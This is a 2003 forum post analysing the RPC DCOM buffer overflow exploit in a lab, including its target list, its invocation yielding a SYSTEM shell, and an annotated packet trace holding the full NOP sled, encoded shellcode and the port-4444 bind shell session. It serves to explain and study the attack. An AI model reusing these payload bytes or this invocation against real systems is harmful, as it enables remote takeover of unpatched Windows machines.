• RSS
  • Twitter
  • FaceBook

Security Forums

Log in

FAQ | Search | Usergroups | Profile | Register | RSS | Posting Guidelines | Recent Posts

RPC DCOM exploit and cursory analysis

Users browsing this topic:0 Security Fans, 0 Stealth Security Fans
Registered Security Fans: None
Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Exploits // System Weaknesses

View previous topic :: View next topic  
Author Message
alt.don
SF Boss
SF Boss


Joined: 04 Mar 2003
Posts: 16777080


Offline

PostPosted: Wed Aug 06, 2003 7:03 pm    Post subject: RPC DCOM exploit and cursory analysis Reply with quote

Cursory analysis of the RPC DCOM exploit rewritten by hdm

Lab conditions for the RPC DCOM exploit by hdm

192.168.2.113 This is the machine which is sending the exploit. It is a SuSE 8.0 Pro box.

192.168.2.101 This is the victim machine. It is Win2K Pro Svc Pack I This machine is unprotected ie: no firewall or filtering router in front of it.

All of the lab machines are connected via an SMC Barricade switch. This can effectively simulate the below noted packets arriving to their destination without actually sending them over the internet. As well please note that my references to src machine mean the source computer pushing across the exploit, and that dst equates to destination computer.

The below noted packet trace has been truncated for the sake of brevity. There were over a thousand packets exchanged during the exploit itself, and subsequent cursory manipulation of the victim machine. The entire packet trace can be found on the enclosed floppy. Also note that the below noted packet trace is done in a time sequential order vice a hodge podge of packets ie: from the beginning of the exploit to the end. That being said please see the below noted packet trace for an explanation of the exploit, as well as to see it in action. The text below a packet references the packet directly above it. The packet trace follows the below noted invocation of the exploit itself, and the resulting command prompt returned.

Cut and Paste of xterm window showing exploit interface when invoked
Code:

 monkeeboy:/home/don # ./don2.1

---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM <hdm [at] metasploit.com>
- Usage: ./don2.1 <Target ID> <Target IP>
- Targets:
- 0 Windows 2000 SP0 (english)
- 1 Windows 2000 SP1 (english)
- 2 Windows 2000 SP2 (english)
- 3 Windows 2000 SP3 (english)
- 4 Windows 2000 SP4 (english)
- 5 Windows XP SP0 (english)
- 6 Windows XP SP1 (english)
Code:

 monkeeboy:/home/don # ./don2.1 1 192.168.2.101

---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM <hdm [at] metasploit.com>
- Using return address of 0x77e829ec
- Dropping to System Shell...

The below noted is the command prompt returned by the victim machine
Code:

 Microsoft Windows 2000 [Version 5.00.2195]
 (C) Copyright 1985-2000 Microsoft Corp.

 C:\WINNT\system32>cd c:\
 cd c:\

 C:\>dir
 dir
  Volume in drive C has no label.
  Volume Serial Number is 60C2-0926

  Directory of C:\

 07/24/2003  01:14p      <DIR>          Documents and Settings
 08/03/2003  10:44a             155,204 don.rpc
 08/03/2003  10:56a               8,007 don.rpc2
 08/01/2003  02:46p      <DIR>          Inetpub
 08/01/2003  02:34p      <DIR>          Program Files
 08/01/2003  11:25a             397,312 WinDump.exe
 08/01/2003  02:47p      <DIR>          WINNT
                3 File(s)        560,523 bytes
                4 Dir(s)   2,694,471,680 bytes free

 C:\>



Packet Trace of RPC DCOM exploit by hdm
Code:

10:42:25.292982 IP (tos 0x0, ttl 64, id 63883, len 60) 192.168.2.113.32773 > 192.168.2.101.135: S [tcp sum ok] 291781359:291781359(0) win 5840 <mss 1460,sackOK,timestamp 50020 0,nop,wscale 0> (DF)
0x0000    4500 003c f98b 4000 4006 bb09 c0a8 0271   E..<..@.@......q
0x0010    c0a8 0265 8005 0087 1164 3aef 0000 0000   ...e.....d:.....
0x0020    a002 16d0 1acc 0000 0204 05b4 0402 080a   ................
0x0030    0000 c364 0000 0000 0103 0300             ...d........

Here we have the initial syn packet sent to the victim machine
Code:

10:42:25.293489 IP (tos 0x0, ttl 128, id 117, len 64) 192.168.2.101.135 > 192.168.2.113.32773: S [tcp sum ok] 4086326976:4086326976(0) ack 291781360 win 17520 <mss 1460,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> (DF)
0x0000    4500 0040 0075 4000 8006 741c c0a8 0265   E..@.u@...t....e
0x0010    c0a8 0271 0087 8005 f390 66c0 1164 3af0   ...q......f..d:.
0x0020    b012 4470 4428 0000 0204 05b4 0103 03000(..........
0x0030    0101 080a 0000 0000 0000 0000 0101 0402................

The victim machine answers with a syn/ack
Code:

10:42:25.293645 IP (tos 0x0, ttl 64, id 63884, len 52) 192.168.2.113.32773 > 192.168.2.101.135: . [tcp sum ok] ack 1 win 5840 <nop,nop,timestamp 50020 0> (DF)
0x0000    4500 0034 f98c 4000 4006 bb10 c0a8 0271   E..4..@.@......q
0x0010    c0a8 0265 8005 0087 1164 3af0 f390 66c1   ...e.....d:...f.
0x0020    8010 16d0 ef2e 0000 0101 080a 0000 c364   ...............d
0x0030    0000 0000                                 ....

The source machine launching the exploit answers back with an ack signifying the end of the 3 way tcp/ip handshake

3 way tcp/ip handshake now over, and the exchange of data will begin
Code:

10:42:25.299962 IP (tos 0x0, ttl 64, id 63885, len 124) 192.168.2.113.32773 > 192.168.2.101.135: P [tcp sum ok] 1:73(72) ack 1 win 5840 <nop,nop,timestamp 50020 0> (DF)
0x0000    4500 007c f98d 4000 4006 bac7 c0a8 0271   E..|..@.@......q
0x0010    c0a8 0265 8005 0087 1164 3af0 f390 66c1   ...e.....d:...f.
0x0020    8018 16d0 a5f5 0000 0101 080a 0000 c364   ...............d
0x0030    0000 0000 0500 0b03 1000 0000 4800 0000   ............H...
0x0040    7f00 0000 d016 d016 0000 0000 0100 0000   ................
0x0050    0100 0100 a001 0000 0000 0000 c000 0000   ................
0x0060    0000 0046 0000 0000 045d 888a eb1c c911   ...F.....]......
0x0070    9fe8 0800 2b10 4860 0200 0000             ....+.H`....

This a psh/ack as seen above though with no data in it. Possibly just testing connectivity again before the shell code is pushed across.
Code:

10:42:25.495010 IP (tos 0x0, ttl 128, id 118, len 52) 192.168.2.101.135 > 192.168.2.113.32773: . [tcp sum ok] ack 73 win 17448 <nop,nop,timestamp 2865 50020> (DF)
0x0000    4500 0034 0076 4000 8006 7427 c0a8 0265   E..4.v@...t'...e
0x0010    c0a8 0271 0087 8005 f390 66c1 1164 3b38   ...q......f..d;8
0x0020    8010 4428 b65d 0000 0101 080a 0000 0b31   ..D(.].........1
0x0030    0000 c364                                 ...d

The victim machine just ack’ng back the receipt of packets
Code:

10:42:32.822800 IP (tos 0x0, ttl 128, id 119, len 112) 192.168.2.101.135 > 192.168.2.113.32773: P [tcp sum ok] 1:61(60) ack 73 win 17448 <nop,nop,timestamp 2938 50020> (DF)
0x0000    4500 0070 0077 4000 8006 73ea c0a8 0265   E..p.w@...s....e
0x0010    c0a8 0271 0087 8005 f390 66c1 1164 3b38   ...q......f..d;8
0x0020    8018 4428 e85e 0000 0101 080a 0000 0b7a   ..D(.^.........z
0x0030    0000 c364 0500 0c03 1000 0000 3c00 0000   ...d........<...
0x0040    7f00 0000 d016 d016 879d 0000 0400 3133   ..............13
0x0050    3500 0000 0100 0000 0000 0000 045d 888a   5............]..
0x0060    eb1c c911 9fe8 0800 2b10 4860 0200 0000   ........+.H`....

The victim machine doing a psh/ack with nothing noted in the ascii
Code:

10:42:32.824173 IP (tos 0x0, ttl 64, id 63886, len 52) 192.168.2.113.32773 > 192.168.2.101.135: . [tcp sum ok] ack 61 win 5840 <nop,nop,timestamp 50773 2938> (DF)
0x0000    4500 0034 f98e 4000 4006 bb0e c0a8 0271   E..4..@.@......q
0x0010    c0a8 0265 8005 0087 1164 3b38 f390 66fd   ...e.....d;8..f.
0x0020    8010 16d0 e03f 0000 0101 080a 0000 c655   .....?.........U
0x0030    0000 0b7a                                 ...z

The src machine ack’ng receipt
Code:

10:42:32.824444 IP (tos 0x0, ttl 64, id 63887, len 1500) 192.168.2.113.32773 > 192.168.2.101.135: . [tcp sum ok] 73:1521(1448) ack 61 win 5840 <nop,nop,timestamp 50773 2938> (DF)
0x0000    4500 05dc f98f 4000 4006 b565 c0a8 0271   E.....@.@..e...q
0x0010    c0a8 0265 8005 0087 1164 3b38 f390 66fd   ...e.....d;8..f.
0x0020    8010 16d0 9d23 0000 0101 080a 0000 c655   .....#.........U
0x0030    0000 0b7a 0500 0003 1000 0000 a806 0000   ...z............
0x0040    e500 0000 9006 0000 0100 0400 0500 0600   ................
0x0050    0100 0000 0000 0000 3224 58fd cc45 6449   ........2$X..EdI
0x0060    b070 ddae 742c 96d2 605e 0d00 0100 0000   .p..t,..`^......
0x0070    0000 0000 705e 0d00 0200 0000 7c5e 0d00   ....p^......|^..
0x0080    0000 0000 1000 0000 8096 f1f1 2a4d ce11   ............*M..
0x0090    a66a 0020 af6e 72f4 0c00 0000 4d41 5242   .j...nr.....MARB
0x00a0    0100 0000 0000 0000 0df0 adba 0000 0000   ................
0x00b0    a8f4 0b00 2006 0000 2006 0000 4d45 4f57   ............MEOW
0x00c0    0400 0000 a201 0000 0000 0000 c000 0000   ................
0x00d0    0000 0046 3803 0000 0000 0000 c000 0000   ...F8...........
0x00e0    0000 0046 0000 0000 f005 0000 e805 0000   ...F............
0x00f0    0000 0000 0110 0800 cccc cccc c800 0000   ................
0x0100    4d45 4f57 e805 0000 d800 0000 0000 0000   MEOW............
0x0110    0200 0000 0700 0000 0000 0000 0000 0000   ................
0x0120    0000 0000 0000 0000 c428 cd00 6429 cd00   .........(..d)..
0x0130    0000 0000 0700 0000 b901 0000 0000 0000   ................
0x0140    c000 0000 0000 0046 ab01 0000 0000 0000   .......F........
0x0150    c000 0000 0000 0046 a501 0000 0000 0000   .......F........
0x0160    c000 0000 0000 0046 a601 0000 0000 0000   .......F........
0x0170    c000 0000 0000 0046 a401 0000 0000 0000   .......F........
0x0180    c000 0000 0000 0046 ad01 0000 0000 0000   .......F........
0x0190    c000 0000 0000 0046 aa01 0000 0000 0000   .......F........
0x01a0    c000 0000 0000 0046 0700 0000 6000 0000   .......F....`...
0x01b0    5800 0000 9000 0000 4000 0000 2000 0000   X.......@.......
0x01c0    3803 0000 3000 0000 0100 0000 0110 0800   8...0...........
0x01d0    cccc cccc 5000 0000 4fb6 8820 ffff ffff   ....P...O.......
0x01e0    0000 0000 0000 0000 0000 0000 0000 0000   ................
0x01f0    0000 0000 0000 0000 0000 0000 0000 0000   ................
0x0200    0000 0000 0000 0000 0000 0000 0000 0000   ................
0x0210    0000 0000 0000 0000 0000 0000 0000 0000   ................
0x0220    0000 0000 0000 0000 0000 0000 0110 0800   ................
0x0230    cccc cccc 4800 0000 0700 6600 0609 0200   ....H.....f.....
0x0240    0000 0000 c000 0000 0000 0046 1000 0000   ...........F....
0x0250    0000 0000 0000 0000 0100 0000 0000 0000   ................
0x0260    7819 0c00 5800 0000 0500 0600 0100 0000   x...X...........
0x0270    70d8 9893 984f d211 a93d be57 b200 0000   p....O...=.W....
0x0280    3200 3100 0110 0800 cccc cccc 8000 0000   2.1.............
0x0290    0df0 adba 0000 0000 0000 0000 0000 0000   ................
0x02a0    0000 0000 1843 1400 0000 0000 6000 0000   .....C......`...
0x02b0    6000 0000 4d45 4f57 0400 0000 c001 0000   `...MEOW........
0x02c0    0000 0000 c000 0000 0000 0046 3b03 0000   ...........F;...
0x02d0    0000 0000 c000 0000 0000 0046 0000 0000   ...........F....
0x02e0    3000 0000 0100 0100 81c5 1703 800e e94a   0..............J
0x02f0    9999 f18a 506f 7a85 0200 0000 0000 0000   ....Poz.........
0x0300    0000 0000 0000 0000 0000 0000 0000 0000   ................
0x0310    0100 0000 0110 0800 cccc cccc 3000 0000   ............0...
0x0320    7800 6e00 0000 0000 d8da 0d00 0000 0000   x.n.............
0x0330    0000 0000 202f 0c00 0000 0000 0000 0000   ...../..........
0x0340    0300 0000 0000 0000 0300 0000 4600 5800   ............F.X.
0x0350    0000 0000 0110 0800 cccc cccc 1000 0000   ................
0x0360    3000 2e00 0000 0000 0000 0000 0000 0000   0...............
0x0370    0000 0000 0110 0800 cccc cccc 6800 0000   ............h...
0x0380    0e00 ffff 688b 0b00 0200 0000 0000 0000   ....h...........
0x0390    0000 0000 8601 0000 0000 0000 8601 0000   ................
0x03a0    5c00 5c00 4600 5800 4e00 4200 4600 5800   \.\.F.X.N.B.F.X.
0x03b0    4600 5800 4e00 4200 4600 5800 4600 5800   F.X.N.B.F.X.F.X.
0x03c0    4600 5800 4600 5800 ec29 e877 cce0 fd7f   F.X.F.X..).w....
0x03d0    cce0 fd7f 9090 9090 9090 9090 9090 9090   ................
0x03e0    9090 9090 9090 9090 9090 9090 9090 9090   ................
0x03f0    9090 9090 9090 9090 9090 9090 9090 9090   ................
0x0400    9090 9090 9090 9090 9090 9090 9090 9090   ................
0x0410    9090 9090 9090 9090 9090 9090 9090 9090   ................
0x0420    9090 9090 9090 9090 9090 9090 9090 9090   ................
0x0430    9090 9090 9090 9090 9090 9090 9090 9090   ................
0x0440    9090 9090 9090 9090 9090 9090 9090 9090   ................
0x0450    9090 9090 9090 9090 9090 9090 9090 9090   ................
0x0460    9090 9090 9090 9090 9090 9090 9090 9090   ................
0x0470    9090 9090 9090 9090 9090 90eb 195e 31c9   .............^1.
0x0480    81e9 89ff ffff 8136 80bf 3294 81ee fcff   .......6..2.....
0x0490    ffff e2f2 eb05 e8e2 ffff ff03 5306 1f74   ............S..t
0x04a0    5775 9580 bfbb 927f 895a 1ace b1de 7ce1   Wu.......Z....|.
0x04b0    be32 9409 f93a 6bb6 d79f 4d85 71da c681   .2...:k...M.q...
0x04c0    bf32 1dc6 b35a f8ec bf32 fcb3 8d1c f0e8   .2...Z...2......
0x04d0    c841 a6df ebcd c288 3674 907f 895a e67e   .A......6t...Z.~
0x04e0    0c24 7cad be32 9409 f922 6bb6 d74c 4c62   .$|..2..."k..LLb
0x04f0    ccda 8a81 bf32 1dc6 abcd e284 d7f9 797c   .....2........y|
0x0500    84da 9a81 bf32 1dc6 a7cd e284 d7eb 9d75   .....2.........u
0x0510    12da 6a80 bf32 1dc6 a3cd e284 d796 8ef0   ..j..2..........
0x0520    78da 7a80 bf32 1dc6 9fcd e284 d796 39ae   x.z..2........9.
0x0530    56da 4a80 bf32 1dc6 9bcd e284 d7d7 dd06   V.J..2..........
0x0540    f6da 5a80 bf32 1dc6 97cd e284 d7d5 ed46   ..Z..2.........F
0x0550    c6da 2a80 bf32 1dc6 9301 6b01 53a2 9580   ..*..2....k.S...
0x0560    bf66 fc81 be32 947f e92a c4d0 ef62 d4d0   .f...2...*...b..
0x0570    ff62 6bd6 a3b9 4cd7 e85a 9680 ae6e 1f4c   .bk...L..Z...n.L
0x0580    d524 c5d3 4064 b4d7 eccd c2a4 e863 c77f   .$..@d.......c..
0x0590    e91a 1f50 d757 ece5 bf5a f7ed db1c 1de6   ...P.W...Z......
0x05a0    8fb1 78d4 320e b0b3 7f01 5d03 7e27 3f62   ..x.2.....].~'?b
0x05b0    42f4 d0a4 af76 6ac4 9b0f 1dd4 9b7a 1dd4   B....vj......z..
0x05c0    9b7e 1dd4 9b62 19c4 9b22 c0d0 ee63 c5ea   .~...b..."...c..
0x05d0    be63 c57f c902 c57f e922 1f4c             .c.......".L

Here we have the src machine pushing across the actual shell code itself. Note the packet is maximal length ie: 1500 bytes, and that the references to “meow” seen above are for debugging purposes to see if the exploit runs properly. Note again the large amount of “no op’s” in the packet. This is always a characteristic of buffer overflows, and many vulnerabilities found in Windows.
Code:

10:42:32.824516 IP (tos 0x0, ttl 64, id 63888, len 308) 192.168.2.113.32773 > 192.168.2.101.135: P [tcp sum ok] 1521:1777(256) ack 61 win 5840 <nop,nop,timestamp 50773 2938> (DF)
0x0000    4500 0134 f990 4000 4006 ba0c c0a8 0271   E..4..@.@......q
0x0010    c0a8 0265 8005 0087 1164 40e0 f390 66fd   ...e.....d@...f.
0x0020    8018 16d0 3eac 0000 0101 080a 0000 c655   ....>..........U
0x0030    0000 0b7a d5cd 6bb1 4064 980b 7765 6bd6   ...z..k.@d..wek.
0x0040    93cd c294 ea64 f021 8f32 9480 3af2 ec8c   .....d.!.2..:...
0x0050    3472 980b cf2e 390b d73a 7f89 3472 a00b   4r....9..:..4r..
0x0060    178a 9480 bfb9 51de e2f0 9080 ec67 c2d7   ......Q......g..
0x0070    345e b098 3477 a80b eb37 ec83 6ab9 de98   4^..4w...7..j...
0x0080    3468 b483 62d1 a6c9 3406 1f83 4a01 6b7c   4h..b...4...J.k|
0x0090    8cf2 38ba 7b46 9341 703f 9778 54c0 affc   ..8.{F.Ap?.xT...
0x00a0    9b26 e161 3468 b083 6254 1f8c f4b9 ce9c   .&.a4h..bT......
0x00b0    bcef 1f84 3431 516b bd01 540b 6a6d cadd   ....41Qk..T.jm..
0x00c0    e4f0 9080 2fa2 0400 5c00 4300 2400 5c00   ..../...\.C.$.\.
0x00d0    3100 3200 3300 3400 3500 3600 3100 3100   1.2.3.4.5.6.1.1.
0x00e0    3100 3100 3100 3100 3100 3100 3100 3100   1.1.1.1.1.1.1.1.
0x00f0    3100 3100 3100 3100 3100 2e00 6400 6f00   1.1.1.1.1...d.o.
0x0100    6300 0000 0110 0800 cccc cccc 2000 0000   c...............
0x0110    3000 2d00 0000 0000 882a 0c00 0200 0000   0.-......*......
0x0120    0100 0000 288c 0c00 0100 0000 0700 0000   ....(...........
0x0130    0000 0000                                 ....

This is another packet sent by the src machine to finish sending the exploit itself across

Exploit received by victim machine, connection teardown now happens
Code:

10:42:32.824613 IP (tos 0x0, ttl 64, id 63889, len 52) 192.168.2.113.32773 > 192.168.2.101.135: F [tcp sum ok] 1777:1777(0) ack 61 win 5840 <nop,nop,timestamp 50773 2938> (DF)
0x0000    4500 0034 f991 4000 4006 bb0b c0a8 0271   E..4..@.@......q
0x0010    c0a8 0265 8005 0087 1164 41e0 f390 66fd   ...e.....dA...f.
0x0020    8011 16d0 d996 0000 0101 080a 0000 c655   ...............U
0x0030    0000 0b7a                                 ...z

10:42:32.824705 IP (tos 0x0, ttl 128, id 120, len 52) 192.168.2.101.135 > 192.168.2.113.32773: . [tcp sum ok] ack 1777 win 17520 <nop,nop,timestamp 2938 50773> (DF)
0x0000    4500 0034 0078 4000 8006 7425 c0a8 0265   E..4.x@...t%...e
0x0010    c0a8 0271 0087 8005 f390 66fd 1164 41e0   ...q......f..dA.
0x0020    8010 4470 abf7 0000 0101 080a 0000 0b7a   ..Dp...........z
0x0030    0000 c655                                 ...U

10:42:32.824717 IP (tos 0x0, ttl 128, id 121, len 52) 192.168.2.101.135 > 192.168.2.113.32773: . [tcp sum ok] ack 1778 win 17520 <nop,nop,timestamp 2938 50773> (DF)
0x0000    4500 0034 0079 4000 8006 7424 c0a8 0265   E..4.y@...t$...e
0x0010    c0a8 0271 0087 8005 f390 66fd 1164 41e1   ...q......f..dA.
0x0020    8010 4470 abf6 0000 0101 080a 0000 0b7a   ..Dp...........z
0x0030    0000 c655                                 ...U

10:42:32.828101 IP (tos 0x0, ttl 128, id 122, len 52) 192.168.2.101.135 > 192.168.2.113.32773: F [tcp sum ok] 61:61(0) ack 1778 win 17520 <nop,nop,timestamp 2938 50773> (DF)
0x0000    4500 0034 007a 4000 8006 7423 c0a8 0265   E..4.z@...t#...e
0x0010    c0a8 0271 0087 8005 f390 66fd 1164 41e1   ...q......f..dA.
0x0020    8011 4470 abf5 0000 0101 080a 0000 0b7a   ..Dp...........z
0x0030    0000 c655                                 ...U

The exploit has now been pushed over to the victim machine and the source computer will now begin a graceful teardown of the connection on port 135 as seen above. Note that the teardown sequence is; fin/ack, ack, ack, fin/ack
Code:

10:42:32.828243 IP (tos 0x0, ttl 255, id 0, len 52) 192.168.2.113.32773 > 192.168.2.101.135: . [tcp sum ok] ack 62 win 5840 <nop,nop,timestamp 50773 2938> (DF)
0x0000    4500 0034 0000 4000 ff06 f59c c0a8 0271   E..4..@........q
0x0010    c0a8 0265 8005 0087 1164 41e1 f390 66fe   ...e.....dA...f.
0x0020    8010 16d0 d995 0000 0101 080a 0000 c655   ...............U
0x0030    0000 0b7a                                 ...z

The src machine ack’s back one more time after the graceful teardown.

Victim machine now answering on port 4444
Code:

10:42:33.832985 IP (tos 0x0, ttl 64, id 36074, len 60) 192.168.2.113.32774 > 192.168.2.101.4444: S [tcp sum ok] 307972688:307972688(0) win 5840 <mss 1460,sackOK,timestamp 50874 0,nop,wscale 0> (DF)
0x0000    4500 003c 8cea 4000 4006 27ab c0a8 0271   E..<..@.@.'....q
0x0010    c0a8 0265 8006 115c 125b 4a50 0000 0000   ...e...\.[JP....
0x0020    a002 16d0 f647 0000 0204 05b4 0402 080a   .....G..........
0x0030    0000 c6ba 0000 0000 0103 0300             ............

The source machine now begins the tcp/ip handshake with the now compromised machine on port 4444 with a syn packet. This port is hard coded in the shell code of the exploit itself.
Code:

10:42:33.833589 IP (tos 0x0, ttl 128, id 123, len 64) 192.168.2.101.4444 > 192.168.2.113.32774: S [tcp sum ok] 4088540613:4088540613(0) ack 307972689 win 17520 <mss 1460,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> (DF)
0x0000    4500 0040 007b 4000 8006 7416 c0a8 0265   E..@.{@...t....e
0x0010    c0a8 0271 115c 8006 f3b2 2dc5 125b 4a51   ...q.\....-..[JQ
0x0020    b012 4470 5bd3 0000 0204 05b4 0103 0300..Dp[...........
0x0030    0101 080a 0000 0000 0000 0000 0101 0402................

The victim machine syn/acks back on port 4444
Code:

10:42:33.833746 IP (tos 0x0, ttl 64, id 36075, len 52) 192.168.2.113.32774 > 192.168.2.101.4444: . [tcp sum ok] ack 1 win 5840 <nop,nop,timestamp 50874 0> (DF)
0x0000    4500 0034 8ceb 4000 4006 27b2 c0a8 0271   E..4..@.@.'....q
0x0010    c0a8 0265 8006 115c 125b 4a51 f3b2 2dc6   ...e...\.[JQ..-.
0x0020    8010 16d0 0384 0000 0101 080a 0000 c6ba   ................
0x0030    0000 0000                                 ....

The handshake is now complete, and the exchange of data can now begin.

The victim machine has now given up a cmd shell to the src machine
Code:

10:42:36.777332 IP (tos 0x0, ttl 128, id 124, len 94) 192.168.2.101.4444 > 192.168.2.113.32774: P [tcp sum ok] 1:43(42) ack 1 win 17520 <nop,nop,timestamp 2977 50874> (DF)
0x0000    4500 005e 007c 4000 8006 73f7 c0a8 0265   E..^.|@...s....e
0x0010    c0a8 0271 115c 8006 f3b2 2dc6 125b 4a51   ...q.\....-..[JQ
0x0020    8018 4470 008a 0000 0101 080a 0000 0ba1..Dp............
0x0030    0000 c6ba 4d69 6372 6f73 6f66 7420 5769   ....Microsoft.Wi
0x0040    6e64 6f77 7320 3230 3030 205b 5665 7273   ndows.2000.[Vers
0x0050    696f 6e20 352e 3030 2e32 3139 355d        ion.5.00.2195]

10:42:36.777533 IP (tos 0x0, ttl 64, id 36076, len 52) 192.168.2.113.32774 > 192.168.2.101.4444: . [tcp sum ok] ack 43 win 5840 <nop,nop,timestamp 51168 2977> (DF)
0x0000    4500 0034 8cec 4000 4006 27b1 c0a8 0271   E..4..@.@.'....q
0x0010    c0a8 0265 8006 115c 125b 4a51 f3b2 2df0   ...e...\.[JQ..-.
0x0020    8010 16d0 f692 0000 0101 080a 0000 c7e0   ................
0x0030    0000 0ba1                                 ....

10:42:36.777638 IP (tos 0x0, ttl 128, id 125, len 54) 192.168.2.101.4444 > 192.168.2.113.32774: P [tcp sum ok] 43:45(2) ack 1 win 17520 <nop,nop,timestamp 2977 51168> (DF)
0x0000    4500 0036 007d 4000 8006 741e c0a8 0265   E..6.}@...t....e
0x0010    c0a8 0271 115c 8006 f3b2 2df0 125b 4a51   ...q.\....-..[JQ
0x0020    8018 4470 bbde 0000 0101 080a 0000 0ba1..Dp............
0x0030    0000 c7e0 0d0a                            ......

10:42:36.777775 IP (tos 0x0, ttl 64, id 36077, len 52) 192.168.2.113.32774 > 192.168.2.101.4444: . [tcp sum ok] ack 45 win 5840 <nop,nop,timestamp 51168 2977> (DF)
0x0000    4500 0034 8ced 4000 4006 27b0 c0a8 0271   E..4..@.@.'....q
0x0010    c0a8 0265 8006 115c 125b 4a51 f3b2 2df2   ...e...\.[JQ..-.
0x0020    8010 16d0 f690 0000 0101 080a 0000 c7e0   ................
0x0030    0000 0ba1                                 ....

10:42:36.777864 IP (tos 0x0, ttl 128, id 126, len 93) 192.168.2.101.4444 > 192.168.2.113.32774: P [tcp sum ok] 45:86(41) ack 1 win 17520 <nop,nop,timestamp 2977 51168> (DF)
0x0000    4500 005d 007e 4000 8006 73f6 c0a8 0265   E..].~@...s....e
0x0010    c0a8 0271 115c 8006 f3b2 2df2 125b 4a51   ...q.\....-..[JQ
0x0020    8018 4470 8ccd 0000 0101 080a 0000 0ba1   ..Dp............
0x0030    0000 c7e0 2843 2920 436f 7079 7269 6768   ....(C).Copyrigh
0x0040    7420 3139 3835 2d32 3030 3020 4d69 6372   t.1985-2000.Micr
0x0050    6f73 6f66 7420 436f 7270 2e0d 0a          osoft.Corp...

10:42:36.778000 IP (tos 0x0, ttl 64, id 36078, len 52) 192.168.2.113.32774 > 192.168.2.101.4444: . [tcp sum ok] ack 86 win 5840 <nop,nop,timestamp 51168 2977> (DF)
0x0000    4500 0034 8cee 4000 4006 27af c0a8 0271   E..4..@.@.'....q
0x0010    c0a8 0265 8006 115c 125b 4a51 f3b2 2e1b   ...e...\.[JQ....
0x0020    8010 16d0 f667 0000 0101 080a 0000 c7e0   .....g..........
0x0030    0000 0ba1                                 ....

10:42:36.778127 IP (tos 0x0, ttl 128, id 127, len 54) 192.168.2.101.4444 > 192.168.2.113.32774: P [tcp sum ok] 86:88(2) ack 1 win 17520 <nop,nop,timestamp 2977 51168> (DF)
0x0000    4500 0036 007f 4000 8006 741c c0a8 0265   E..6..@...t....e
0x0010    c0a8 0271 115c 8006 f3b2 2e1b 125b 4a51   ...q.\.......[JQ
0x0020    8018 4470 bbb3 0000 0101 080a 0000 0ba1   ..Dp............
0x0030    0000 c7e0 0d0a                                                    ......

This is where we manipulate the victim machine a little bit, as can be seen by the request for Dir of C.
Code:

10:43:07.376735 IP (tos 0x0, ttl 128, id 461, len 113) 192.168.2.101.4444 > 192.168.2.113.32774: P [tcp sum ok] 84324:84385(61) ack 16 win 17505 <nop,nop,timestamp 3283 54228> (DF)
0x0000    4500 0071 01cd 4000 8006 7293 c0a8 0265   E..q..@...r....e
0x0010    c0a8 0271 115c 8006 f3b3 7729 125b 4a60   ...q.\....w).[J`
0x0020    8018 4461 cf71 0000 0101 080a 0000 0cd3   ..Da.q..........
0x0030    0000 d3d4 3037 2f32 342f 3230 3033 2020   ....07/24/2003..
0x0040    3031 3a31 3470 2020 2020 2020 3c44 4952   01:14p......<DIR
0x0050    3e20 2020 2020 2020 2020 2044 6f63 756d   >..........Docum
0x0060    656e 7473 2061 6e64 2053 6574 7469 6e67   ents.and.Setting
0x0070    73                                        s

10:43:07.378049 IP (tos 0x0, ttl 64, id 36343, len 52) 192.168.2.113.32774 > 192.168.2.101.4444: . [tcp sum ok] ack 84385 win 53576 <nop,nop,timestamp 54228 3283> (DF)
0x0000    4500 0034 8df7 4000 4006 26a6 c0a8 0271   E..4..@.@.&....q
0x0010    c0a8 0265 8006 115c 125b 4a60 f3b3 7766   ...e...\.[J`..wf
0x0020    8010 d148 e56d 0000 0101 080a 0000 d3d4   ...H.m..........
0x0030    0000 0cd3                                 ....

10:43:07.378160 IP (tos 0x0, ttl 128, id 462, len 349) 192.168.2.101.4444 > 192.168.2.113.32774: P [tcp sum ok] 84385:84682(297) ack 16 win 17505 <nop,nop,timestamp 3283 54228> (DF)
0x0000    4500 015d 01ce 4000 8006 71a6 c0a8 0265   E..]..@...q....e
0x0010    c0a8 0271 115c 8006 f3b3 7766 125b 4a60   ...q.\....wf.[J`
0x0020    8018 4461 2cd4 0000 0101 080a 0000 0cd3   ..Da,...........
0x0030    0000 d3d4 0d0a 3038 2f30 332f 3230 3033   ......08/03/2003
0x0040    2020 3130 3a34 3361 2020 2020 2020 2020   ..10:43a........
0x0050    2020 2020 2031 3336 2c32 3337 2064 6f6e   .....136,237.don
0x0060    2e72 7063 0d0a 3038 2f30 312f 3230 3033   .rpc..08/01/2003
0x0070    2020 3032 3a34 3670 2020 2020 2020 3c44   ..02:46p......<D
0x0080    4952 3e20 2020 2020 2020 2020 2049 6e65   IR>..........Ine
0x0090    7470 7562 0d0a 3038 2f30 312f 3230 3033   tpub..08/01/2003
0x00a0    2020 3032 3a33 3470 2020 2020 2020 3c44   ..02:34p......<D
0x00b0    4952 3e20 2020 2020 2020 2020 2050 726f   IR>..........Pro
0x00c0    6772 616d 2046 696c 6573 0d0a 3038 2f30   gram.Files..08/0
0x00d0    312f 3230 3033 2020 3131 3a32 3561 2020   1/2003..11:25a..
0x00e0    2020 2020 2020 2020 2020 2033 3937 2c33   ...........397,3
0x00f0    3132 2057 696e 4475 6d70 2e65 7865 0d0a   12.WinDump.exe..
0x0100    3038 2f30 312f 3230 3033 2020 3032 3a34   08/01/2003..02:4
0x0110    3770 2020 2020 2020 3c44 4952 3e20 2020   7p......<DIR>...
0x0120    2020 2020 2020 2057 494e 4e54 0d0a 2020   .......WINNT....
0x0130    2020 2020 2020 2020 2020 2020 2032 2046   .............2.F
0x0140    696c 6528 7329 2020 2020 2020 2020 3533   ile(s)........53
0x0150    332c 3534 3920 6279 7465 730d 0a          3,549.bytes..

10:43:07.378337 IP (tos 0x0, ttl 64, id 36344, len 52) 192.168.2.113.32774 > 192.168.2.101.4444: . [tcp sum ok] ack 84682 win 53576 <nop,nop,timestamp 54228 3283> (DF)
0x0000    4500 0034 8df8 4000 4006 26a5 c0a8 0271   E..4..@.@.&....q
0x0010    c0a8 0265 8006 115c 125b 4a60 f3b3 788f   ...e...\.[J`..x.
0x0020    8010 d148 e444 0000 0101 080a 0000 d3d4   ...H.D..........
0x0030    0000 0cd3                                 ....

